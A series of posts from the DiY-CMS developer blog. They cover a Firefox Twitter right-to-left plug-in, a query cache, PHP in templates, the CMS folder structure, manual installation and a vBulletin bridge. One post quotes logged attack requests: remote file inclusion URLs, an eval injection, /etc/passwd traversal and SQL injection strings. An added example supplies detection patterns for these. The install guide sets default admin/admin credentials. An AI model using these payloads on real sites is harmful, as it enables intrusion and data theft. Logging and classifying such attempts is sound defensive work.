My first plug-in for Firefox: Twitter Right-To-Left

  By: admin   tags Date Added: Thursday 24-02-2011


In the last couple of weeks I was busy reading about how to create a plug-in for Firefox. My intention was to create a plug-in that manipulates pages in a certain way to improve their look or add extra functionality. Then I came across the Greasemonkey plug-in.

The Greasemonkey plug-in allows you to write a JavaScript file and load it into the plug-in. The script file is specific to a certain website and adds modifications or improves the look and feel of that website.

So I started writing my plug-in for Firefox. Twitter is one of the most popular social websites. Its users are from all over the world; however, it provides a limited set of user interface languages. The list provided does not include Arabic, nor any other Right-To-Left languages such as Persian and Hebrew. My idea was to design the plug-in so I can modify the interface of Twitter to shift the page direction from Left-To-Right to Right-To-Left and translate the Twitter page into Arabic.

Look at this example:



I finished the script but I did not like the idea of adding a file to the Greasemonkey plug-in, since it is enough of a hassle for the end user to add a plug-in to the browser and set its configuration. Luckily I came across the Greasemonkey compiler. The compiler takes the "user script" (the Greasemonkey term for the JS file) and converts it into a Firefox plug-in, and voila, the plug-in is ready for Firefox.

You can download it through this link:
https://addons.mozilla.org/en-US/firefox/addon/twitterrtl/

The plug-in is compatible with Firefox versions: 3.0 to 4 beta.

Note: I am interested in translations into Persian and Hebrew so if you are capable of that please contact me on: info@diy-cms.com

You can follow me on twitter on this account:
http://twitter.com/khr2003

And you can get the latest DiY-CMS news on:
http://twitter.com/diycms


Tags: firefox-plugin, twitter, right-to-left

New DiY-CMS features 2: adding code to templates and improving update system

  By: admin   tags Date Added: Wednesday 09-02-2011

In my last blog I talked about the new updates that I developed for DiY-CMS. I talked about the cache system and in this blog I will be talking about the other two new improvements, namely: adding php code to main templates and improving the update system in the control panel.

One of the most needed features was to allow code to be inserted and parsed in the templates of DiY-CMS themes. Adding code provides great flexibility for designing and creating dynamic themes. I have changed the way that main templates are parsed within DiY-CMS. The eval() function is no longer used for parsing, as it is frowned upon by many developers due to the security risks it might pose, as well as its inability to parse PHP code inside templates (in the case of DiY-CMS) without a number of unnecessary modifications to the CMS.

So what is the benefit of enabling code parsing within main templates? The main advantage is that creating a theme would be easier and more dynamic. For instance, one could use condition statements (one of the commonly used statements in themes) to change a colour, a column or practically anything else. One can even add functions or any snippet of code he might like to the theme that he is creating. The second advantage is that I am working on developing theme settings, for which this change comes in handy. This means that a designer would add settings to his theme, these settings can be modified by a general user through an interface, and the designer will incorporate PHP code to modify the look and feel of the theme based on these settings.

Since now PHP code is accepted within main templates one can use the standard PHP file inclusion function rather than DiY-CMS style, for instance to include the file ‘blocks/tags.block.php’ instead of using:


<!--INC dir="blocks" file="tags.block.php" -->

One could use this style:

<?php include('blocks/tags.block.php'); ?>

I have mentioned earlier that the eval() function is no longer used, and that means that variables inside the main templates will not be rendered correctly (variables are the words preceded by the dollar sign $). For example $index_middle will not render correctly and it needs to be enclosed by PHP tags like so:

<?php echo $index_middle; ?>

I have updated all the themes in the download center to conform to the new system, and – hopefully – you would not have problems installing or running them on your website.
The second update I will be talking about in this blog is the improvement of the update system in the control panel. I have made a number of improvements to the underlying code of the system and modified it to retrieve data in JSON format from the DiY-CMS official website. This will allow for a more efficient and smooth update process. I also improved the system to accept ZIP files. Using this feature the website administrator would be able to install a bunch of updates in one click. In order for this feature to work you need the ZIP library installed on your hosting server. It is mostly installed, but if it is not you can ask your hosting provider to install it for you.
I hope that these features will be of great help to all the users of DiY-CMS, and I hope to hear your opinions in the comments.


Tags: updates, features, php-code

New DiY-CMS features 1: reducing queries by 50-85%

  By: admin   tags Date Added: Wednesday 09-02-2011

After I finished programming my first app for Facebook - Friends Stat, I started thinking about new ways to improve DiY-CMS. I have many ideas to develop but there are three of them which I believe are important. They are: a cache system to minimise MySQL queries, adding PHP code into main templates and improving the update system in the DiY-CMS control panel.

I will explain the first feature in this blog and then talk about the rest in later blogs.
The cache system is developed to ease the process of retrieving data from the database. In other words, the cache system saves the results of repetitive queries that do not change often into files and then retrieves the data from these files rather than querying the database again and again. As you might have guessed by now, this process will reduce the load on the database and increase the CMS performance.

In DiY-CMS there are a number of queries that do not change often, such as general settings, module settings, plugin details, themes, templates and other queries. The cache system will save the results of each one of these queries to a single file and place it in the cache folder. Once a query is requested in the front-end, DiY-CMS will check if there is a cache file relevant to that query and retrieve the results saved in it; otherwise the query will run normally.

Cache files do not have an expiry date, so files would remain for an unlimited period of time. What if I make changes to settings, theme or templates? In this case the relevant cache file would be updated automatically once changes occur in the control panel. Also, you can remove cache files manually from the Cache folder any time you wish and DiY-CMS will create new cache files.

This feature reduces MySQL queries and therefore increases overall performance. In some pages of DiY-CMS queries reached as little as 1 query per page. Certainly the number of queries cached would differ from one module to another and from one page to another, but on average MySQL queries have been minimised by 50-85%. See chart below.



Furthermore, you can use this system to cache queries that you might use in modules, plugins or blocks you develop for DiY-CMS. Implementing cache is easy and requires three functions: one to create the cache file, a second one to check whether the file exists and a third one to retrieve its data.

Say we have this query that we want to cache:

$result = $diy_db->query("SELECT variable,value FROM diy_settings");


You would place this code in the place where the data of diy_settings is updated:

// Query the database table and collect the rows into an array
$result = $diy_db->query("SELECT variable,value FROM diy_settings");
$array = array();
while ($row = $diy_db->dbarray($result)) {
    $key = $row['variable'];
    $array[$key] = $row['value'];
}

// create a cache file and save data into it
$diy_db->create_query_cache_file('global_settings', $array);


Notice that the create_query_cache_file() function takes two parameters: the first one is the file name and the second one is the query data that needs to be cached.

Then you would use this code to check for the file and retrieve its data:

// check if file exists
$cache = $diy_db->check_query_cache_file('global_settings');
if ($cache) {
    // if file exists retrieve its data and place them in a variable
    $array = $diy_db->get_query_cache_file('global_settings');
} else {
    // if file does not exist proceed with query as normal
    $result = $diy_db->query("SELECT variable,value FROM diy_settings");

    $array = array();
    $i = 0; // row counter passed to dbarray()
    while ($row = $diy_db->dbarray($result, $i++)) {
        $key = $row['variable'];
        $array[$key] = $row['value'];
    }
}
// here $array data can be used as wished


In the last code snippet there are two important functions: the first one is check_query_cache_file(), which checks if the file exists, and the second, get_query_cache_file(), retrieves data from the cache file. Both functions take one parameter, which is the file name that we created using the create_query_cache_file() function.
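One way the three cache functions described above could be written, as an added example that is not DiY-CMS's own code (PHP 7.4+). The class name QueryCache, the cache directory and the choice of JSON as the storage format are assumptions; in DiY-CMS the functions are methods of $diy_db.

```php
<?php
// Added example, not DiY-CMS code: a file-backed cache exposing the three functions
// named in the post. Class name, cache directory and JSON storage are assumptions.

final class QueryCache
{
    private string $dir;

    public function __construct(string $dir)
    {
        if (!is_dir($dir) && !mkdir($dir, 0700, true)) {
            throw new RuntimeException('cannot create cache directory');
        }
        $this->dir = rtrim($dir, '/');
    }

    /** Map a cache name to a file path. Only letters, digits, "_" and "-" are accepted,
     *  so a name such as "../admin/conf" cannot point outside the cache folder. */
    private function path(string $name): string
    {
        if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
            throw new InvalidArgumentException('invalid cache name');
        }
        return $this->dir . '/' . $name . '.json';
    }

    /** Store query results as JSON: data only, nothing PHP would execute or unserialize. */
    public function create_query_cache_file(string $name, array $data): void
    {
        $target = $this->path($name);
        $tmp = tempnam($this->dir, 'qc_');
        if ($tmp === false
            || file_put_contents($tmp, json_encode($data, JSON_THROW_ON_ERROR)) === false
            || !rename($tmp, $target)) {   // rename() swaps the finished file into place
            throw new RuntimeException('cannot write cache file');
        }
    }

    public function check_query_cache_file(string $name): bool
    {
        return is_file($this->path($name));
    }

    public function get_query_cache_file(string $name): array
    {
        $raw = file_get_contents($this->path($name));
        $data = $raw === false ? null : json_decode($raw, true);
        if (!is_array($data)) {
            throw new RuntimeException('cache file unreadable or corrupt');
        }
        return $data;
    }
}

// Constructed sample rows stand in for the diy_settings query result.
$cache = new QueryCache(sys_get_temp_dir() . '/diy_cache_demo');
if (!$cache->check_query_cache_file('global_settings')) {
    $cache->create_query_cache_file('global_settings', ['site_title' => 'Demo', 'theme' => 'default']);
}
print_r($cache->get_query_cache_file('global_settings'));

try {
    $cache->check_query_cache_file('../admin/conf');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Keeping the cache folder outside the web root, or denying direct requests to it, stops cached settings from being downloaded as static files.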

I hope that this blog provides some insights into the feature of DiY-CMS and how to use them.

In next blog I will explain the rest of features.


Tags: updates-diy-cms-mysql

Learning the structure of DiY-CMS folders and file - Part 3

  By: admin   tags Date Added: Tuesday 09-11-2010

This is the third post that is directed to the developers more than the end user. In this post I will talk about the files in the “includes” folder in the root DiY-CMS directory. Knowing the task of each file will assist the developer to understand the architecture of DiY-CMS and data flow as well.




The includes folder contains the files responsible for the main tasks that run DiY-CMS and control the different aspects of the CMS.

Here is the list of folders and files:
PHPMailer folder: This folder contains the folders and files of the popular mail program PHPMailer. It is the standard program in DiY-CMS to send emails for notifications or other uses.

bbcode.class.php: This file contains the class that handles bbcode format.

blocks.class.php: This file handles the arrangement of blocks (menus) in DiY-CMS view.

date_conversion.class.php: handles date conversion in DiY-CMS. It converts Gregorian date to Hijri (Islamic lunar) date and vice-versa.

email.class.php: This class utilises the functions of PHPMailer and groups them in one class to ease its use.

files.class.php: This class handles files read and write functions.

form.class.php: This file contains the functions needed to produce a form with different fields, such as creating an input field or textarea.

general.functions.php: This file contains general functions like functions handling page header, page footer, errors or message display.

hooks.functions.php: This file handles hooks management in DiY-CMS. You can use it to place a hook in a certain place in the module or plug-in you develop. Alternatively, you can use it to hook your functions to the built-in hooks in DiY-CMS. (I will explain how hooks work in detail in a future post).

keyword_generator.class.php: This class is used to generate keywords on the fly for posts in DiY-CMS. It increases the posts' friendliness to search engines.

login.class.php: This file controls users’ authentication in DiY-CMS.

module.class.php: This file is responsible for module management. It checks the module's status, loads its templates, loads its settings and runs the module.

mysql.class.php: This file contains the necessary functions that manage database connection, querying, database error handling.

plugins.class.php: This file handles plug-in management. It loads all the active plug-ins, loads settings, loads permissions and then runs the plug-ins.

post.functions.php: This file contains post-related functions. They include post sanitisation, preventing SQL injections, checking required fields and other functions.

protection.php: This file mainly prevents XSS attacks on DiY-CMS.

session.class.php: This class handles sessions.

spam.class.php: This class prevents post spamming in DiY-CMS by checking the IP address and the time interval between two consecutive posts of the same user.

templae.class.php: This class handles theme-related tasks. It checks for the theme selected, loads its templates, processes their content and then outputs the page.

upload.class.php: This class handles file uploads in DiY-CMS. It can handle adding or editing multiple files at the same time.

I hope you liked this post, and I look forward to hearing your comments and suggestions.


Tags: DiY-CMS-structure

Yeah! Preventing more than 3000 hacking attempts

  By: admin   tags Date Added: Wednesday 03-11-2010

Security is one of the most important criteria in any script one would like to use. In this post I will talk about the security in DiY-CMS. DiY-CMS has the ability to prevent and record most hacking attempts.
Since April 11th http://www.diy-cms.com has prevented more than 3000 hacking attempts in both the English and the Arabic sections. Bear in mind that these are only the recorded attempts; SQL injection attempts through forms, for example, are prevented but not recorded for a number of reasons.

Attempts example:
Several methods were used to hack into DiY-CMS; they include remote file inclusion, SQL injection and attempts to access root folders and files.
Here are a few examples:

Remote file inclusion (I replaced original site names with SITE-NAME):

/mod.php?mod=http://www. SITE-NAME.com.mx/admin/xroot.txt?
/?path=http://stul. SITE-NAME.cz/img/.jancuk/injek.txt??

/mod.php?mod=download&modfile=view_file&downid=1%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://nic. SITE-NAME.edu.cn/media/j1.txt???

/index.php//openi-admin/base/fileloader.php?config[openi_dir]=http://SITE-NAME.co.kr/poll/aipi/id.txt??

/index.php//cms/system/openengine.php?oe_classpath=http://SITE-NAME.org/Scripts/bogel/id1.txt????

/mod.php?mod=http://SITE-NAME.com/admin/images/index.txt?


Accessing root files and folders:
//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00

/mod.php?mod=../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/htdocs
/cgi-bin/logs
/cgi-bin/root

/mod.php?mod=http://jmbioanalises.com.br/Lims/images/g.txt?



SQL injection:
 /mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null%20where%20"x"="x

/mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,null%20where%20"x"="x

/mod.php?mod=27%20AND%20ascii(substring((SELECT%20distinct%20table_name%20FROM%20information_schema.tables%20Where%20table_schema=0x202020%20limit%2019,1),3,1))

/mod.php?mod=blog&modfile=index&page=2&start=10%20union%20select%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*%20and%201=1


Geographic locations:
Attempts were initiated from more than 50 countries. Here is a graph of the top 6 countries where attempts originated from:



And here is a full list of countries where attempts originated from with the number of attempts:
Brazil => 52
United States => 52
Republic of Korea => 13
Saudi Arabia => 12
Germany => 7
United Kingdom => 7
Oman => 6
Morocco => 6
Algeria => 5
Palestinian Territory => 5
France => 5
Italy => 5
Turkey => 5
Indonesia => 4
Canada => 4
Netherlands => 4
Australia => 4
Russian Federation => 4
Belgium => 3
Kuwait => 3
Bulgaria => 3
Hungary => 3
Iraq => 2
Islamic Republic of Iran => 2
Czech Republic => 2
Poland => 2
Bahamas => 2
Austria => 2
Malaysia => 2
Japan => 2
Slovakia => 1
Ukraine => 1
South Africa => 1
Norway => 1
Belarus => 1
Argentina => 1
Azerbaijan => 1
Peru => 1
Bahrain => 1
Egypt => 1
Denmark => 1
Israel => 1
Thailand => 1
Syrian Arab Republic => 1
Latvia => 1
Martinique => 1
India => 1
Libyan Arab Jamahiriya => 1
Europe => 1
Mexico => 1
Greece => 1
Tunisia => 1


I hope that this post explains how powerful DiY-CMS is when it comes to security and preventing hacking attempts, and I will always add more security measures to it.

If you want to check the types of hacking attempts your site is getting you can check “html/bugs.txt” file for the list of all hacking attempts.
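To sort logged requests into the three categories this post lists, the following added example (not DiY-CMS code) labels each request URI as remote file inclusion, path traversal or SQL injection. The function names and patterns are assumptions; the first four sample lines are copied from the post and the last is a constructed benign request.

```php
<?php
// Added example, not DiY-CMS code. Function names and patterns are assumptions.

/** Percent-decode up to three times so double-encoded input is inspected in clear. */
function decode_fully(string $s): string
{
    for ($i = 0; $i < 3; $i++) {
        $decoded = rawurldecode($s);
        if ($decoded === $s) {
            break;
        }
        $s = $decoded;
    }
    return $s;
}

/** Return the decoded parameter values found after the first "?" of a raw URI. */
function query_values(string $uri): array
{
    $pos = strpos($uri, '?');
    if ($pos === false) {
        return [];
    }
    $values = [];
    foreach (explode('&', substr($uri, $pos + 1)) as $pair) {
        $eq = strpos($pair, '=');
        if ($eq !== false) {
            $values[] = decode_fully(substr($pair, $eq + 1));
        }
    }
    return $values;
}

/** Label one request URI; an empty array means no pattern matched. */
function classify_request(string $uri): array
{
    $labels = [];
    $whole = decode_fully($uri);

    // Remote file inclusion: a parameter value that is itself a URL or stream wrapper.
    foreach (query_values($uri) as $value) {
        if (preg_match('~^\s*(?:https?|ftp|php|data|expect):~i', $value)) {
            $labels['remote-file-inclusion'] = true;
        }
    }
    // Path traversal: "../" or "..\" sequences, or a NUL byte that truncates a suffix.
    if (preg_match('~\.\.[/\\\\]~', $whole) || strpos($whole, "\0") !== false) {
        $labels['path-traversal'] = true;
    }
    // SQL injection: UNION SELECT probes and schema enumeration.
    if (preg_match('~\bunion\b\s+(?:all\s+)?select\b|information_schema~i', $whole)) {
        $labels['sql-injection'] = true;
    }
    return array_keys($labels);
}

// The first four lines are copied from the post; the last is a constructed benign request.
$samples = [
    '/mod.php?mod=http://www. SITE-NAME.com.mx/admin/xroot.txt?',
    '/mod.php?mod=../../../../../../../../../../../../../../../etc/passwd%00',
    '/mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null%20where%20"x"="x',
    '/mod.php?mod=27%20AND%20ascii(substring((SELECT%20distinct%20table_name%20FROM%20information_schema.tables%20Where%20table_schema=0x202020%20limit%2019,1),3,1))',
    '/mod.php?mod=blog&modfile=index&page=2',
];
foreach ($samples as $uri) {
    $labels = classify_request($uri);
    printf("%-22s %s\n", $labels ? implode(',', $labels) : 'clean', $uri);
}
```

These patterns are for triaging a log after the fact; a parameter that legitimately carries a URL would also be labelled, so they are not a substitute for validating the mod parameter against the list of installed modules.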


Tags: prevent-hacking-

Learning the structure of DiY-CMS folders and file - Part 2

  By: admin   tags Date Added: Sunday 31-10-2010

In the last post I explained the task that each file in the root directory handles. In this post, I will keep on explaining the rest of the folders in the root directory.



Admin folder: This folder contains the folders and files that are responsible for the administration part of DiY-CMS. It contains four folders and a number of files.

admin_classes folder: contains the essential PHP classes to run the administration area.

admin_lang folder: contains the language file for the UI of the administration panel.

admin_sections folder: contains the folders responsible for the different administration sections (the menus to the left of the administration panel), such as managing modules, themes, etc.

admin_skin folder: contains the skin or themes for the administration panel.

conf.php: contains the values required for database connection, folders location, site administration contact details and some other values.

index.php: runs the main view of the DiY-CMS admin panel.

global.php: Global file for DiY-CMS panel area, it must be included in all files in the admin area.
sections.php: Manages sections view and management in the admin panel.


Blocks folder: This folder includes all the blocks (or menus) designed for DiY-CMS.

Html folder: Contains files required by the included WYSIWYG editor in DiY-CMS.

Images folder: Includes images that are used globally across DiY-CMS.

Includes folder: contains the necessary PHP classes to run DiY-CMS such as database connection, themes management, module control and other functionality. (I will explain the tasks that each file handles in a future tutorial).

Install folder: This folder is responsible for running the installation wizard when using DiY-CMS for the first time at your server. If installation is complete the folder name will be changed for security reasons.

Lang folder: Contains the languages files for DiY-CMS interface.

Modules folder: Contains modules folders.

Plugins folder: Contains DiY-CMS plug-ins folders and files.

Themes folder: Contains DiY-CMS themes.

Upload folder: This folder is used for file upload. It should be the only place for file upload. This will make data transfer or upgrade easier for the end-user.

Please let me know if any part of this tutorial needs to be further explained.


Tags: DiY-CMS-structure

Learning the structure of DiY-CMS folders and file - Part 1

  By: admin   tags Date Added: Wednesday 20-10-2010

When I created DiY-CMS I made a number of tutorials explaining how to manage and use DiY-CMS. Those tutorials were tailored to the general user of the CMS, a user who has little or no programming knowledge. Since that series of tutorials is complete, I will be starting another series, one that is made specifically for developers who wish to develop DiY-CMS to create modules or plug-ins for DiY-CMS, or modify it in any way they wish. Basically, this tutorial series is mainly for developers with sound programming language knowledge.

I will start by explaining the general structure of the folders and files of DiY-CMS. Then I will write a number of tutorials detailing the best way to program a plug-in. I will then explain how to program a module and the best practices that one should use for programming.

In this tutorial I will start with the first part of explaining the folder and file structure of DiY-CMS. I will explore the folders one by one and explain the files they contain and their main functions.

Once you download DiY-CMS and extract the zipped file, you will find a structure similar to this:



In the first part I will explain what each file in the root folder does then I will explain the function of the rest of the folders and files in the second part.

.htaccess: contains information about url re-write.

control.php: provides a user interface to manage modules from one place.

filemanager.php: renders image files, particularly avatar, thumb images and can be used to render any kind of image.

global.php: This file is a global file, meaning that it must be included in all files of DiY-CMS. It manages the inclusion of the necessary files to run DiY-CMS, such as files responsible for database connection, theme selection or user authorisation. By default all modules have this file included, so you do not have to include it in any module file you would like to program.

index.php: this is the index file of DiY-CMS. It displays the first page of DiY-CMS to the user.
licence.txt: the licence of DiY-CMS. Since DiY-CMS is an open-source program, the GPL licence (GNU GENERAL PUBLIC LICENSE) is used.

mod.php: this file manages the display of DiY-CMS modules. It is responsible for reading the general layout of any opened module.

online.php: retrieves the number of people online and their location in DiY-CMS.

robots.txt: communicates with search engine crawlers and tells them which part of DiY-CMS to access and not to access.

In the second part of this tutorial I will explore the contents of admin folder.


Tags: file-structure, diy-cms

How to install DiY-CMS manually

  By: admin   tags Date Added: Thursday 14-10-2010

If you ever ran into an issue during the installation process of diy-cms this blog will solve your problems using the good old manual way. In this blog I will explain how to install DiY-CMS on the local server on your website manually and without the built-in installation wizard.


First of all we need to create a database using phpMyAdmin. Open phpMyAdmin and then create a database as shown in image 1 below. Make sure that you select the utf-8 encoding for both the database encoding and the connection collation. This is to ensure that DiY-CMS will function correctly when displaying non-English characters or using a different language such as Arabic, Hebrew, Chinese or other languages.


Image 1



Second step: click on import at the top of the page. Then import this file “install/install.sql” to the database as shown in image 2.



Image 2




Third step: Remove install folder from the DiY-CMS folder.

Fourth step: open the file “admin/conf.php” and replace the values between the curly brackets {} (along with the {} themselves) with the appropriate values:

$CONF['dbname'] = "{server_db}"; // Database name
$CONF['dbuser'] = "{server_un}"; // Database user
$CONF['dbpword'] = "{server_pass}"; // Database password

$CONF['site_path'] = "{path}"; // Path to your site
$CONF['upload_path'] = "{uppath}"; // Path to the upload folder
$CONF['site_url'] = '{sitelink}'; // website URL
$CONF['site_mail'] = "{sitemail}"; // Website Email
$CONF['site_title'] = "{sitetitle}"; // Website Title
$CONF['cookie_domain'] = '{domain}'; // Website URL


Final Step: At this stage you would be able to login to your website using these credentials:
Username: admin
Password: admin

Change your password to whatever you want then customize the CMS to your needs.

I hope this tutorial was useful.


Tags: install, manual

Finally, a DiY-CMS / vBulletin bridge

  By: admin   tags Date Added: Friday 24-09-2010



Finally, I was able to create a bridge between DiY-CMS and vBulletin forum. I designed the bridge in the form of a plug-in so it is easier for administrators to control it. The plug-in would unify registration and login in DiY-CMS and vBulletin forums.

The plug-in will:
1- Unify registration. User would have to register once using the same registration form.
2- Unify login, through DiY-CMS only.
3- Unify logout, through DiY-CMS only.
4- Import users who registered through vBulletin forms.

Installation:
1- Download plug-in from this link: http://www.diy-cms.com/mod.php?mod=download&modfile=view_file&downid=30

2- Extract the contents of the zip file and then upload the folder to the plugins folder in your website.

3- Open config.php inside the plug-in folder and edit this line:
define('FORUMPATH', 'D:/xampp/htdocs/vb/'); // path to your forum 


Change D:/xampp/htdocs/vb/ to the path of the vBulletin forums on your website.

4- Install the plug-in through the admin panel. In the plug-in setup tick the users module only. You can select other modules; however, this will increase the number of database queries, and the plug-in is programmed to work only on the users module (since that is all it needs to function correctly).

5- In the plug-in settings you will see the following:



Select the new users group. Link DiY-CMS groups to the corresponding vBulletin forum groups.

Import users to DiY-CMS by clicking on the green button. You have to repeat the last step (the importing part) from time to time in order to import users who register through vBulletin.

Alternatively, you can disable registration at vBulletin and enable it only through DiY-CMS.


Tags: vbulltein-bridge, diy-cms

Blog module for DiY-CMS

  By: admin   tags Date Added: Tuesday 31-08-2010


Hi
As promised, I made the blog module available for download. This website is a live example of the blog module.

Module features:
- Unlimited categories and subcategories.
- Groups-based permissions for adding and editing posts.
- ability to add tags to blogs.
- and many more.

to download the module:
http://www.diy-cms.com/download/view_file/downid_27


Tags: blog, module, diy-cms
